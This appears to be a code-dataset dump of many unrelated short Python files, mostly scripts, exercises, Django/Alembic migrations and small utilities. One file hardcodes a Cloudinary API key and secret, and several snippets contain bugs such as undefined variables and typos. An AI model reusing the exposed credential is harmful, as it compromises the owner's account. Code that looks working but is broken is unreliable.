text stringlengths 8 6.05M |
|---|
print("julia safada") |
# Libraries for Path Management and Handling Directories
import os
from os import makedirs
from os import listdir
from shutil import copyfile
from shutil import rmtree
from random import seed
from random import random
# Main Directory, adjust according to your File System Structure
os.chdir("C:/github_simba_ex2/")
# Set Seed for Generation of Random Numbers for splitting files into Training and Validation
seed(5555)
# define ratio of pictures to use for validation
val_ratio = 0.3
test_ratio = 0 # Not used in this implementation. Test data are manually provided in specific subdirectories
# Static Variables for Folder Structure
src_directory = 'images_all/training_small_140/' # From which directory to take images from
# src_directory = 'images_all/training_all/'
dst_directory = 'images_model/'
categories = ['goldens','non_goldens','simba']
sub_directories = ['train','validation','test']
# Delete Folders (to get rid of content) and create Subfolders
rmtree(dst_directory)
makedirs(dst_directory)
for dir in sub_directories:
makedirs(dst_directory + '/' + dir)
for cat in categories:
makedirs(dst_directory + dir + '/' + cat)
# Copy Images for Training, Valiation and Test Folder
for category in categories:
for file in listdir(src_directory + category):
src = src_directory + category + '/' + file
if random() < val_ratio:
dst = dst_directory + 'validation/' + category + '/' + file
copyfile(src, dst)
elif random() > (1-test_ratio):
dst = dst_directory + 'test/' + category + '/' + file
copyfile(src, dst)
else:
dst = dst_directory + 'train/' + category + '/' + file
copyfile(src, dst)
|
import psycopg2
conn = psycopg2.connect(database="news")
cursor = conn.cursor()
cursor.execute('''select articles.slug, count(log.path) as a from
articles join log on SUBSTRING( log.path, 10)=articles.slug
group by articles.slug order by a desc limit 3;''')
results = cursor.fetchall()
print('1. What are the most popular three articles of all time?')
for result in results:
print(result[0], result[1])
cursor.execute('''select authors.name, articalsslug.a from authors, articles,
articalsslug where authors.id = articles.author and
articles.slug = articalsslug.slug;''')
results = cursor.fetchall()
print('2. Who are the most popular article authors of all time?')
for result in results:
print(result[0], result[1])
cursor.execute('''select * from (select (nfstatus/ sum( okstatus + nfstatus)
* 100) as Error, date from days group by date, nfstatus) as Error
where Error > 1;''')
results = cursor.fetchall()
print('3. On which days did more than 1% of requests lead to errors?')
for result in results:
print(result[0], result[1])
conn.close()
|
from jBird.utils.Constants import PlayerPos
class Player(object):
"""Class containing methods and attributes referring to current player."""
def __init__(self, nick):
"""Player initialize."""
self.nick = nick
self.hp = 2
self.points = 0
self.width = PlayerPos.START_WIDTH.value
self.height = PlayerPos.START_HEIGHT.value
def add_points(self, points=10):
"""Adding player's health points."""
self.points += points
def add_hp(self):
"""Adding player's health points."""
self.hp += 1
def sub_hp(self):
"""Subtracting player's health points."""
self.hp -= 1
def did_i_lose(self):
"""Checking if player lost."""
if self.hp < 0:
return True
return False
|
from celery.task import Task
from celery.registry import tasks
from celery.task import PeriodicTask
import datetime
from datetime import timedelta
from django.db.models import F
#from yoolotto.second_chance.models import ResetCoins
import celery
|
import random
import time
from tkinter import *
root = Tk ()
canv = Canvas (root, width = 600, height = 500)
canv.pack ()
A = [0] * 100
for i in range (len (A)):
A[i] = random.randint (1, 100)
for n in range(len (A)):
m = A[n]
for j in range (len(A) - n):
if A[j + n] > m:
m = A[j + n]
x = j + n
A[n], A[x] = m, A[n]
canv.delete ("all")
for p in range (n + 1):
canv.create_rectangle (p * 5 + 50, 400, p * 5 + 53, 400 - 3 * A[p], fill = "blue")
for t in range (n + 1, len(A)):
canv.create_rectangle (t * 5 + 50, 400, t * 5 + 53, 400 - 3 * A[t])
canv.update ()
time.sleep (0.1)
root.mainloop () |
import re
def is_pangram(sentence):
letters_seen = ''
alphabet_re = re.compile('[a-z]')
for letter in sentence.lower():
if alphabet_re.search(letter):
if letter in letters_seen:
next
else:
letters_seen += letter
if len(letters_seen) == 26:
return True
else:
return False
|
#!/usr/bin/env python
import sys
# input comes from STDIN (standard input)
for line in sys.stdin:
# remove leading and trailing whitespace
line = line.strip()
# print(line)
# split the line into words
words = line.split(",")
year = ''
if len(words) == 3:
if "-" in words[0]:
year = words[0].split("-")[2]
# print(year, words[2])
print('%s\t%s' % (year, words[2]))
|
import web
import config
import firebase_admin
import cloudinary.uploader
db = config.db
cloudinary.config(
cloud_name = "patyluprz",
api_key = "448467956332495",
api_secret = "iovK969N-ZReTDBMukFZp8JKrq0"
)
def insertFoto(image):
try:
result = cloudinary.uploader.upload(image)
return result['secure_url']
except Exception as e:
print("error insertImage: " +str(e.args))
return False
def insertarRestaurante(nombre,telefono,direccion,email,foto,latitud,longitud):
try:
doc_ref = db.collection(u'restaurantes').document()
doc_ref.set({
u'direccion': direccion,
u'foto': u'default.jpg',
u'nombre': nombre,
u'telefono': telefono,
u'email': email,
u'foto':foto,
u'latitud':latitud,
u'longitud':longitud
})
return True
except Exception as e:
print("error model insertar restaurante" + str(e.args))
return False
def insertarNegocio(nombre,telefono,direccion,email,foto,latitud,longitud):
try:
doc_ref = db.collection(u'locales').document()
doc_ref.set({
u'direccion': direccion,
u'foto': u'default.jpg',
u'nombre': nombre,
u'telefono': telefono,
u'email': email,
u'foto':foto,
u'latitud':latitud,
u'longitud':longitud
})
return True
except Exception as e:
print("error model insertar local" + str(e.args))
return False
def insertarCliente(nombre,telefono,direccion,email,foto):
try:
doc_ref = db.collection(u'clientes').document()
doc_ref.set({
u'direccion': direccion,
u'foto': u'default.jpg',
u'nombre': nombre,
u'telefono': telefono,
u'email': email,
u'foto':foto
})
return True
except Exception as e:
print("error model insertar cliente" + str(e.args))
return False
|
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import cv2
from tensorflow.keras.preprocessing.image import ImageDataGenerator
train_datagen = ImageDataGenerator(
rescale=1./255)
train_generator = train_datagen.flow_from_directory(
'../data',
classes=['dirty_mnist_2nd'],
batch_size=50000,
target_size=(64, 64),
color_mode='grayscale',
class_mode=None,
shuffle=False)
for i in train_generator:
x_train = i
break
print(x_train.shape)
img = x_train[0]
img = np.where(img>=255, img, 0)
img = cv2.dilate(img, kernel=np.ones((2,2), np.uint8), iterations=1)
img = cv2.medianBlur(scr=img, ksize=5)
'''
i = 92
image_path = '../data/dirty_mnist_2nd/{:05d}.png'.format(i)
img = cv2.imread(image_path)
img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
img = np.where(img>=255, img, 0)
_img = cv2.dilate(img, kernel=np.ones((2,2), np.uint8), iterations=1)
_img = cv2.medianBlur(src=_img, ksize=5)
# _img = cv2.bilateralFilter(_img, 10, 50, 50)
# _img = np.where(_img>=255, img, 0)
# _img = np.array(_img, dtype=np.uint8)
# denoised_img = cv2.fastNlMeansDenoising(img, None, 30, 7, 9)
print(_img.shape)
cv2.imshow('before', img)
cv2.imshow("after", _img)
cv2.waitKey(0)
cv2.destroyAllWindows()
contour, hierachy = cv2.findContours(_img, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)
cv2.drawContours(_img, [contour[0]], 0, (0, 0, 255), 2)
cv2.imshow(_img)
cv2.destroyAllWindows()
''' |
import math
class Machine:
def __init__(self, id):
self.id = id
self.running_job_id = -1
self.is_free = True
self.job_history = []
def taken_by_job(self, job_id):
if self.is_free:
self.running_job_id = job_id
self.is_free = False
self.job_history.append(job_id)
return True
else:
return False
def release(self):
if self.is_free:
return -1
else:
self.is_free = True
self.running_job_id = -1
return 1
def reset(self):
self.is_free = True
self.running_job_id = -1
self.job_history = []
def __eq__(self, other):
return self.id == other.id
def __str__(self):
return "M["+str(self.id)+"] "
class Cluster:
def __init__(self, cluster_name, node_num, num_procs_per_node):
self.name = cluster_name
self.total_node = node_num
self.free_node = node_num
self.used_node = 0
self.num_procs_per_node = num_procs_per_node
self.all_nodes = []
for i in range(self.total_node):
self.all_nodes.append(Machine(i))
def feature(self):
return [self.free_node]
def can_allocated(self, job):
if job.request_number_of_nodes != -1 and job.request_number_of_nodes > self.free_node:
return False
if job.request_number_of_nodes != -1 and job.request_number_of_nodes <= self.free_node:
return True
request_node = int(math.ceil(float(job.request_number_of_processors)/float(self.num_procs_per_node)))
job.request_number_of_nodes = request_node
if request_node > self.free_node:
return False
else:
return True
def allocate(self, job_id, request_num_procs):
allocated_nodes = []
request_node = int(math.ceil(float(request_num_procs) / float(self.num_procs_per_node)))
if request_node > self.free_node:
return []
allocated = 0
for m in self.all_nodes:
if allocated == request_node:
return allocated_nodes
if m.taken_by_job(job_id):
allocated += 1
self.used_node += 1
self.free_node -= 1
allocated_nodes.append(m)
if allocated == request_node:
return allocated_nodes
print ("Error in allocation, there are enough free resources but can not allocated!")
return []
def release(self, releases):
self.used_node -= len(releases)
self.free_node += len(releases)
for m in releases:
m.release()
def is_idle(self):
if self.used_node == 0:
return True
return False
def reset(self):
self.used_node = 0
self.free_node = self.total_node
for m in self.all_nodes:
m.reset()
class FakeList:
def __init__(self, l):
self.len = l
def __len__(self):
return self.len
class SimpleCluster:
def __init__(self, cluster_name, node_num, num_procs_per_node):
self.name = cluster_name
self.total_node = node_num
self.free_node = node_num
self.used_node = 0
self.num_procs_per_node = num_procs_per_node
self.all_nodes = []
def feature(self):
return [self.free_node]
def can_allocated(self, job):
if job.request_number_of_nodes != -1:
if job.request_number_of_nodes > self.free_node:
return False
else:
return True
request_node = int(math.ceil(float(job.request_number_of_processors)/float(self.num_procs_per_node)))
job.request_number_of_nodes = request_node
if request_node > self.free_node:
return False
else:
return True
def allocate(self, job_id, request_num_procs):
allocated_nodes = FakeList(0)
request_node = int(math.ceil(float(request_num_procs) / float(self.num_procs_per_node)))
if request_node > self.free_node:
return []
allocated = request_node
self.used_node += allocated
self.free_node -= allocated
allocated_nodes.len = allocated
if allocated == request_node:
return allocated_nodes
print ("Error in allocation, there are enough free resources but can not allocated!")
return []
def release(self, releases):
self.used_node -= len(releases)
self.free_node += len(releases)
def is_idle(self):
if self.used_node == 0:
return True
return False
def reset(self):
self.used_node = 0
self.free_node = self.total_node
Cluster = SimpleCluster |
# @Title: 根据身高重建队列 (Queue Reconstruction by Height)
# @Author: 2464512446@qq.com
# @Date: 2020-11-16 11:39:35
# @Runtime: 116 ms
# @Memory: 14 MB
class Solution:
def reconstructQueue(self, people: List[List[int]]) -> List[List[int]]:
if len(people) <= 1:
return people
people = sorted(people, key = lambda x: (-x[0], x[1]))
# print(people)
# new_people = [people[0]] # 这个人是从前往后、从上往下看到的第一个人
new_people = []
for i in people:
new_people.insert(i[1], i)
return new_people
|
# weight value
# item1 5 60
# item2 3 50
# item3 4 70
# item4 2 30
# max_weight=5 find max value we can get!
# ans:80
# we choose item4 and item2
weight=[5,3,4,2]
max_weight=5
value=[60,50,70,30]
dp_matrix=[[None for j in range(max_weight+1)] for i in range(len(value)+1)]
def print_matrix(a):
for i in range(len(a)):
for j in range(len(a[0])):
print(a[i][j],end=" ")
print()
for i in range(len(dp_matrix)):
for w in range(len(dp_matrix[0])):
if w==0 or i==0:
print("i==0 or w==0")
dp_matrix[i][w]=0
print_matrix(dp_matrix)
elif weight[i-1]<= w:
print ("{}<={}".format(weight[i-1],w))
dp_matrix[i][w]=max(dp_matrix[i-1][w],dp_matrix[i-1][w-weight[i-1]]+value[i-1])
print_matrix(dp_matrix)
else:
print("else")
dp_matrix[i][w]=dp_matrix[i-1][w]
print_matrix(dp_matrix)
print("ans:"+str(dp_matrix[len(value)][max_weight]))
|
class Room:
tag = 1
def __init__(self,name,owner,width,length,height):
self.name=name
self.owner=owner
self.width=width
self.length = length
self.height=height
@property #
def mianji(self):
return self.width * self.length
@property #静态属性 把函数封装成属性
def tiji(self):
return self.width * self.length * self.height
@classmethod #类方法
def tell_info(cls):
print("这是个类方法---",cls.tag)
@staticmethod #类的工具包 与类无关的方法
def wash_room(a,b):
print("%s和%s在清洗房间" %(a,b))
def test(x,y): # 只有类可以调用.实例不可以
print("%s和%s在吃房间" %(x,y))
r1 = Room('别墅','吉泽',100,100,100)
res = r1.mianji
print(res)
print("%s 住的 %s 总面积是%s:" %(r1.owner,r1.name,r1.mianji))
print(r1.tiji)
Room.tell_info()
r1.wash_room('高渐离','阿珂')
Room.wash_room("公孙离",'后裔')
Room.test('2','3') |
# Generated by Django 3.0.3 on 2020-02-29 15:34
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('njrealestate', '0004_auto_20200229_1514'),
]
operations = [
migrations.CreateModel(
name='Propertyclassifications',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('symbol', models.CharField(max_length=3)),
('category', models.CharField(max_length=60)),
],
),
]
|
print('_'*30)
print('\nSequência de Fibonacci')
print('_'*30)
termo = int(input('Digite quantos termos você quer mostrar: '))
t1 = 0
t2 = 1
print(f'{t1} ➞ {t2}', end=' ')
cont = 3
while cont <= termo:
t3 = t1 + t2
print(f'➞ {t3}', end=' ')
t1 = t2
t2 = t3
t3 = t1 + t2
cont += 1 |
{
'name': 'Advanced Pivot Table',
'version': '8.0.0.1',
'author': 'Geo Technosoft',
'sequence':'10',
'category': 'Hidden',
'website': 'https://www.geotechnosoft.com',
'summary': 'Custom Pivot Table',
'description': """
This module will add new features pivot table like click on td.
Example to pass context in action
{'ctx_module_name': 'account',
'ctx_view_xml_id': 'view_move_line_tree',
'ctx_view_form_xml_id': 'view_move_line_form'}
""",
'depends': ['web'],
'data': ['views/webclient_templates.xml'],
'qweb': ['static/src/xml/*.xml'],
'test': [],
'demo': [],
'installable': True,
'application': True,
'auto_install': True,
}
|
'''
Usos comuns:
-Redes
-Requisições
-Abrir ou fechar arquivos
'''
try:
open("Alou")
except Exception as erro:
print("Erro capturado:", erro, "\n")
print("Arruma aê bocó") |
{
"name" : "econube_report",
"version" : "7.0",
"author" : "Econube | pablo cabezas",
"category" : "reportes account",
"description" : "reportes facturas tipo chilean",
"init_xml" : [],
"update_xml" : [
'eco_report.xml',
],
"depends" : ['base','account'],
"active" : False,
"installable" : True,
} |
#!/usr/bin/env python
"""
_SetLocation_
MySQL implementation of Files.SetLocation
"""
from WMCore.Database.DBFormatter import DBFormatter
class SetLocation(DBFormatter):
sql = """INSERT INTO wmbs_file_location (fileid, location)
SELECT :fileid, wmbs_location.id FROM wmbs_location
INNER JOIN wmbs_location_pnns wls ON wls.location = wmbs_location.id
WHERE wls.pnn = :location"""
def getBinds(self, file = None, location = None):
if type(location) == type('string'):
return self.dbi.buildbinds(self.dbi.makelist(file), 'fileid',
self.dbi.buildbinds(self.dbi.makelist(location), 'location'))
elif isinstance(location, (list, set)):
binds = []
for l in location:
binds.extend(self.dbi.buildbinds(self.dbi.makelist(file), 'fileid',
self.dbi.buildbinds(self.dbi.makelist(l), 'location')))
return binds
else:
raise Exception("Type of location argument is not allowed: %s" \
% type(location))
def execute(self, file, location, conn = None, transaction = None):
binds = self.getBinds(file, location)
result = self.dbi.processData(self.sql, binds, conn = conn,
transaction = transaction)
return
|
... the content of __init__.py file.
... definition in __init__.py file will tell other
... python files how is the code hierarchy.
your_package/
__init__.py
file1.py
file2.py
...
fileN.py
# in __init__.py
from .file1 import *
from .file2 import *
...
from .fileN import *
# in file1.py
def add():
pass
... then others can call add() by
from your_package import add
... without knowing file1's inside functions, like
from your_package.file1 import add
|
from xmind.core.markerref import MarkerRefsElement
from xmind.core.const import TAG_MARKERREFS
from xmind.tests import logging_configuration as lc
from xmind.tests import base
from unittest.mock import patch
class MarkerRefsElementTest(base.Base):
"""MarkerRefsElementTest"""
def getLogger(self):
if not getattr(self, '_logger', None):
self._logger = lc.get_logger('MarkerRefsElementTest')
return self._logger
def test_init_without_parameters(self):
"""test that object of the class could be created with different number of parameters and it has correct static attribute"""
with patch('xmind.core.mixin.WorkbookMixinElement.__init__') as WorkbookMixinElementMock:
_test_object = MarkerRefsElement()
WorkbookMixinElementMock.assert_called_with(None, None)
MarkerRefsElement('test')
WorkbookMixinElementMock.assert_called_with('test', None)
MarkerRefsElement('test', 2)
WorkbookMixinElementMock.assert_called_with('test', 2)
MarkerRefsElement(node=None, ownerWorkbook=3)
WorkbookMixinElementMock.assert_called_with(None, 3)
with self.assertRaises(Exception):
MarkerRefsElement('test', 2, 4)
self.assertEqual(WorkbookMixinElementMock.call_count, 4)
self.assertEqual(_test_object.TAG_NAME, TAG_MARKERREFS)
|
import pickle
def save_to_pickle(variable, filename):
with open(filename, 'wb') as handle:
pickle.dump(variable, handle)
def open_pickle(path_to_file):
with open(path_to_file, 'rb') as handle:
f = pickle.load(handle)
return f
class Caching:
def __init__(self):
self.access_list = [
'account_data',
'master_table',
'team_list',
'team_info',
'player_price_data',
'player_stats_data',
'player_top_50_data',
'team_ids',
'username_hash',
]
@staticmethod
def get_cached_data(fname):
return open_pickle('./data/' + fname + '.pickle')
def cache_data(self, fname):
out = {}
for d in self.access_list:
out[d] = getattr(self, d)
save_to_pickle(out, './data/' + fname + '.pickle') |
# add path to the src and test directory
import os
import sys
PARENT_PATH = os.getenv('PYMCTS_ROOT')
SRC_PATH = PARENT_PATH +"src/"
TEST_PATH = PARENT_PATH +"test/"
sys.path.append(SRC_PATH+"algorithm")
sys.path.append(TEST_PATH)
sys.path.append(PARENT_PATH+"performance/accuracy/testset")
sys.path.append(PARENT_PATH+"performance/strength")
sys.path.append(SRC_PATH+"examples/connectfour/")
from unittest import TestCase
from nose.tools import *
import pdb
import mcts
import connectfour_model
import heuristic_model
import game_simulator
def test_game():
mc1 = mcts.MCTS()
mc2 = mcts.MCTS()
model1 = connectfour_model.ConnectFour()
model2 = heuristic_model.ConnectFour()
T = game_simulator.GameSimulator()
res = T.play(mc1,model1,mc2,model2)
ok_(res in [0,1,2])
|
# 🚨 Don't change the code below 👇
print("Welcome to the Love Calculator!")
name1 = input("What is your name? \n")
name2 = input("What is their name? \n")
# 🚨 Don't change the code above 👆
#Write your code below this line 👇
name1_lower = name1.lower()
name2_lower = name2.lower()
t1=name1_lower.count("t")
t2=name2_lower.count("t")
total_t = t1 + t2
r1 =name1_lower.count("r")
r2 = name2_lower.count("r")
total_r = r1 + r2
u1 =name1_lower.count("u")
u2 = name2_lower.count("u")
total_u = u1 + u2
e1 =name1_lower.count("e")
e2 = name2_lower.count("e")
total_e = e1 + e2
first_digit = total_t + total_r + total_u + total_e
l1 =name1_lower.count("l")
l2 = name2_lower.count("l")
total_l = l1 + l2
o1 =name1_lower.count("o")
o2 = name2_lower.count("o")
total_o = o1 + o2
v1 =name1_lower.count("v")
v2 = name2_lower.count("v")
total_v = v1 + v2
e1 =name1_lower.count("e")
e2 = name2_lower.count("e")
total_e = e1 + e2
second_digit = total_l + total_o + total_v + total_e
lovescore =(first_digit + second_digit )
if lovescore < 10 or lovescore > 90:
print("your score is ",lovescore,"you go together like coke and mentos")
elif lovescore > 40 and lovescore < 50:
print("your score is",lovescore,"you are alright together")
else:
print("your score is",lovescore) |
from django.apps import AppConfig
class SpinnerConfig(AppConfig):
name = 'spinner'
|
import time
from datetime import datetime
from features.feature import Feature
from field import Field
from numbersforwatch import Number
from painter import RGB_Field_Painter, Led_Matrix_Painter
class Clock(Feature):
def __init__(self, field_leds: Field, field_matrix: Field, rgb_field_painter: RGB_Field_Painter,
led_matrix_painter: Led_Matrix_Painter):
super(Clock, self).__init__(field_leds, field_matrix, rgb_field_painter, led_matrix_painter)
@staticmethod
def __leading_zeros(number: int) -> str:
return ("0"+str(number))[-2:]
def get_time(self):
tuple_time = datetime.timetuple(datetime.today())
return tuple_time[3], tuple_time[4], tuple_time[5]
def get_date(self):
tuple_date = datetime.timetuple(datetime.today())
return tuple_date[0], tuple_date[1], tuple_date[2]
def draw_clock(self, color: list = None):
self.field_leds.set_all_pixels_to_black()
hour, minute, second = self.get_time()
hour_str = self.__leading_zeros(hour)
minute_str = self.__leading_zeros(minute)
second_str = self.__leading_zeros(second)
clock_array = [int(hour_str[0]), int(hour_str[1]),
int(minute_str[0]), int(minute_str[1]),
int(second_str[0]), int(second_str[1])]
positions = [[0, 1], [5, 1], [0, 7], [5, 7], [0, 13], [5, 13]]
for i in range(6):
digit = clock_array[i]
self.field_leds.set_block(Number(digit).block, positions[i][0], positions[i][1], color)
def get_date_string(self):
self.field_matrix.set_all_pixels_to_black()
_, month, day = self.get_date()
day_str = self.__leading_zeros(day)
month_str = self.__leading_zeros(month)
datetext = day_str + "." + month_str + "."
return datetext
def event(self, eventname: str):
pass
def tick(self):
self.draw_clock()
self.rgb_field_painter.draw(self.field_leds)
self.led_matrix_painter.show_Text(self.get_date_string())
time.sleep(0.05)
def start(self, playername: str = None):
self.field_leds.set_all_pixels_to_black()
self.field_matrix.set_all_pixels_to_black()
self.rgb_field_painter.draw(self.field_leds)
self.led_matrix_painter.draw(self.field_matrix)
def stop(self):
pass
def is_game_over(self):
return False
|
#import sys
#input = sys.stdin.readline
def prime_factor(N): #素因数
ret = 0
middle = int( N**(1/2))
for i in range(2, middle+1):
if N%i == 0:
return i
return N
def factors(N): #約数を全て求める。ただし、順不同
from collections import deque
ret = deque()
middle = int( N**(1/2))
for i in range(1, middle):
if N%i == 0:
ret.append(i)
ret.append(N//i)
if N%middle == 0:
ret.append(middle)
if middle != N//middle:
ret.append(N//middle)
return ret
def solve(N, p):
ANS = []
q = N//p
for i in range(p):
ans = [q]
t = N*(N-1)//2//p
for j in range(q-1):
num = j*p+(j+i)%p
t -= num
ans.append(num*2+1)
if t < 0:
return []
ans.append(t*2+1)
ANS.append(ans)
return ANS
def solve2(N,p):
q = N//p
ANS = []
print(q)
for i in range(q):
ans = [2, i*2+1, N*2-1-i*2]
ANS.append(ans)
print("\n".join([" ".join(map(str, ans)) for ans in ANS]))
return
def main():
# for i in range(2, 10):
# print(i, prime_factor(i))
N = int(input())
# p = prime_factor(N)
# if p == N:
# print("impossible")
# return
ANS = []
for p in factors(N):
if p == 1 or p == N:
continue
if p == 2:
solve2(N,p)
return
ANS = solve(N,p)
if ANS:
print(N//p)
break
# if p == 2:
# print(q)
# for i in range(q):
# ans = [2, i*2+1, N*2-1-i*2]
# ANS.append(ans)
# print("\n".join([" ".join(map(str, ans)) for ans in ANS]))
# return
# print(q)
# for i in range(p):
# ans = [q]
# t = N*(N-1)//2//p
# for j in range(q-1):
# num = j*p+(j+p//2+1+i)%p
# t -= num
# ans.append(num*2+1)
# ans.append(t*2+1)
# ANS.append(ans)
if ANS:
print("\n".join([" ".join(map(str, ans)) for ans in ANS]))
else:
print("impossible")
if __name__ == '__main__':
main()
|
def paty_planner(people ,cook):
cooks = cook // people
left = people % cook
print("Good! Your Paty will have {} people witch a total of {} cookies each people will eat {}and will left {}".format(people,cook,cooks,left))
paty_start = 'y'
while paty_start == 'y':
while True:
try:
people = int(input("Enter how many peoples will go to the paty"))
cooks = int(input("Enter wich the number of cooks"))
q = cooks // people
break
except ZeroDivisionError:
print("no have people Please give a number gretter then 0")
paty_planner(people,cooks)
paty_start="n"
else:
print("bye")
|
from . import *
class IsRestartRequiredCommand(ShellCommand):
name = "needs_restart"
command = "sh -c 'if test -f /var/run/reboot-required.pkgs ; then cat /var/run/reboot-required.pkgs; fi'"
desc = "checks whether a reboot is required (Ubuntu-only)"
supported = "linux"
@staticmethod
def parse(output=None):
if not output:
return ""
return output
@staticmethod
def compare(prev, cur):
if len(cur) > 0:
pkgs = cur.splitlines()
pkgs.sort()
return [W("reboot required"), D("reboot required because of packages [%s]" % (",".join(pkgs)))]
return []
|
"""empty message
Revision ID: e400dee696f2
Revises: 5d6b56b7dc32
Create Date: 2018-10-30 21:04:00.455078
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = 'e400dee696f2'
down_revision = '5d6b56b7dc32'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_foreign_key(None, 'espn_projections', 'field_player', ['player_id'], ['espn_id'])
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_constraint(None, 'espn_projections', type_='foreignkey')
# ### end Alembic commands ###
|
from typing import List
import numpy as np
def cal_q_error(predict, label, log=True):
if log:
predict = np.e**predict
label = np.e**label
if predict > label:
q_error = predict / label
else:
q_error = label / predict
return q_error
def print_qerror(q_error: List):
print("max qerror: {:.4f}".format(max(q_error)))
print("mean qerror: {:.4f}".format(np.mean(q_error)))
print("media qerror: {:.4f}".format(np.median(q_error)))
print("90th qerror: {:.4f}".format(np.percentile(q_error, 90)))
print("95th qerror: {:.4f}".format(np.percentile(q_error, 95)))
print("99th qerror: {:.4f}".format(np.percentile(q_error, 99)))
|
from typing import Any, Dict, List
from .base_api import BaseAPI
class TransactionService(BaseAPI):
URL_BY_NETWORK = {
1: 'https://safe-transaction.mainnet.gnosis.io',
# 3:
4: 'https://safe-transaction.rinkeby.gnosis.io',
# 5:
# 42
}
def get_balances(self, safe_address: str) -> List[Dict[str, Any]]:
response = self._get_request(f'/api/v1/safes/{safe_address}/balances/')
if not response.ok:
raise BaseAPI(f'Cannot get balances from {url}')
else:
return response.json()
def get_transactions(self, safe_address: str) -> List[Dict[str, Any]]:
response = self._get_request(f'/api/v1/safes/{safe_address}/transactions/')
if not response.ok:
raise BaseAPI(f'Cannot get balances from {url}')
else:
return response.json().get('results', [])
|
print "hello,world"
print "Muxistdio yuyilei"
|
from itertools import product
class Solution:
def letterCasePermutation(self, S: str) -> List[str]:
f = lambda x: (x.lower(), x.upper()) if x.isalpha() else (x)
return list(map(''.join, product(*map(f, S)))) |
from bp.Model import Model
import numpy as np
# 卷积神经网络 架构 还不错。。
x = np.ones([8,2,2,1])
x[(1,3,5,7),:,:,:] = np.zeros([4,2,2,1])
y = np.array([[1, 0, 1, 0, 1, 0, 1, 0]])
model = Model(x, y,inputType='image')
model.addConv(shape=(2,2,1,1),ifOutput=False)
model.addReshape(shape=[8,1])
model.addLayer(10,'sigmoid',False)
model.addLayer(1,'sigmoid',True)
for epoch in range(1000):
model.train(10)
|
# try:
# for i in ['a','b','c']:
# i = int(i)
# print (i**2)
# except TypeError:
# print("Une erreur s'est produite ! ")
# def demande():
# while True:
# try:
# n = int(input("Entrer un entier: "))
# except:
# print("Merci d'entre un entier a nouveau")
# continue
# else:
# break
# print("le nombre au carré est : ",n**2)
# demande()
ttc = lambda prixHT:prixHT +(prixHT * 20/100)
print(ttc(24))
|
import time
# Read in data
def get_data(filename, features_in_use):
global top_file_line
file = open(filename)
top_file_line = file.readline()
data = []
for line in file:
data_points = line.split(",")
# Get the features as an np vector
features = [float(x) for x in data_points[0:features_in_use]]
# Get the label as a -1 or +1 modifier
label = int(data_points[-1])
data.append({"label": label, "features": features})
file.close()
return data
# Run through the test set of data, get projections
def predict(classifier, data):
print("Starting predictions.")
for item in data:
features = item['features']
item['label'] = classifier.predict(features)
print("Done predicting.")
# Write results to output location
def write_results(data, output_location):
output_file = open(output_location, "w")
output_file.write("Feature_1,Feature_2,Feature_3,Feature_4,Feature_5,Feature_6,Label\n")
for item in data:
output_file.write(','.join(map(str, item['features'])) + "," + str(item['label']) + "\n")
output_file.close()
# Run the code.
def main(Model, best_item_loc=False, training_set_loc=False, testing_set_loc=False, results_loc=False,
iv_count=False, validation_count=3):
start_time = time.time()
# Grab data
training_data = get_data(training_set_loc, iv_count)
testing_data = get_data(testing_set_loc, iv_count)
# Initialize and train the classifier
classifier = Model(best_item_loc=best_item_loc)
# Validate
if validation_count > 0:
print("Validated accuracy is {:.2%}.".format(classifier.n_fold_validate(training_data, validation_count)))
# Train
classifier.train_with_data(training_data)
# Predict end value
predict(classifier, testing_data)
# Print end values to document
write_results(testing_data, results_loc)
print("--- %s seconds ---" % (time.time() - start_time))
|
from django.conf.urls.defaults import patterns, url
urlpatterns = patterns('',
url(r'^$', 'app.views.home', name='home'),
url(r'^paypal/data.json$', 'app.views.data', name='data'),
url(r'^paypal$', 'app.views.paypal', name='paypal'),
url(r'^graphite$', 'app.views.graphite', name='graphite'),
url(r'^ganglia$', 'app.views.ganglia', name='ganglia'),
url(r'^webapps/sample-manifest.webapp$', 'app.views.webapp_manifest', name='webapp-manifest'),
url(r'^webapps/sample-image.png$', 'app.views.webapp_image', name='webapp-image'),
)
|
"""
This is a password generator script that works as follows:
It allows the user to enter a word or phrase and the length they would like for the password.
If it is over 20 characters then it will ask if they are sure as long passwords aren't memorable unless stored.
If they do not provide a word or phrase it will choose a random word using an API call.
If no length is provided it will choose a random length between 8 and 20.
The most random passwords will be generated by leaving both blank otherwise the only variability comes from the numbers
added to the words.
"""
import random
import json
from random_word import RandomWords
import yaml
import requests
def substitue(word):
"""
Just substitutes letters for similar numbers or symbols.
:param word: the word that will have its letters replaced
:return: the word with the replaced letters
"""
word = word.replace("o", "0")
word = word.replace("a", "@")
word = word.replace("i", "!")
word = word.replace("e", "3")
return word
def randPass(length):
"""
This will generate a random password from scratch by making use of an API to get a random word and then uses the
other functions to change them.
:param length: the length of the password
:return: the password of the given length
"""
r = RandomWords()
# Return a single random word
word = r.get_random_word()
word = addNumbers(word, length)
return word
def addNumbers(word, length):
"""
This will add nubers to end of each word if it is a phrase or single word. The number of characters depends on the
length of the password and then will either append missing to end of a single word or append to end of each word in
the phrase.
For ease of execution this makes use of the substitution function to build the password.
:param word: the word or phrase
:param length: length of the password
:return: the words with the numbers appended.
"""
words = word.split(" ")
password = ""
if len(words) == 1:
if len(word) < length:
word = substitue(word) + str(random.randrange(0, 10000000000000000))[:length - len(word)]
password = word
else:
if len(word) < length:
for x in words:
x = substitue(x) + str(random.randrange(0, 10000000000000000))[:int((length / len(words) - len(x)))]
password += x + " "
else:
for x in words:
password += substitue(x) + " "
return password
def generatePassword(word, length):
"""
This is thr base function that checks the length and if the word/phrase was left blank to decide what happens next.
:param word: word/phrase if applicable
:param length: length of the password if given
:return: the password
"""
words = word.split(" ")
password = ""
if length == 0:
length = random.randrange(8, 20)
if word == "":
password = randPass(length)
else:
password = addNumbers(word, length)
return password
print("The program will generate a random password based of the following criteria:\nIf you leave the word/phrase empty"
" it will generate a random password of the specified length. If you leave the length empty it will generate a "
